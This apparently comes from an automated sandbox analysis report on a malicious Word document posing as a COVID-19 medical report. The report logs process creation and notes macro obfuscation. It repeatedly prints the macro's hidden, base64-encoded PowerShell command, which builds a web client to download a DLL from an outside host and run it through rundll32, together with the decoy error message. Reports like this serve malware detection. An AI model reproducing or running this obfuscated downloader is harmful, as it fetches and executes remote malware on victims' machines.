Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu',RunDLL
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2116036824.0000000002930000.00000002.00000001.sdmp
Source: GT-9333 Medical report COVID-19.docInitial sample: OLE summary subject = National Gorgeous Handcrafted Rubber Chicken Identity transmitting Metal Tasty

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
Source: GT-9333 Medical report COVID-19.docStream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0i
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJ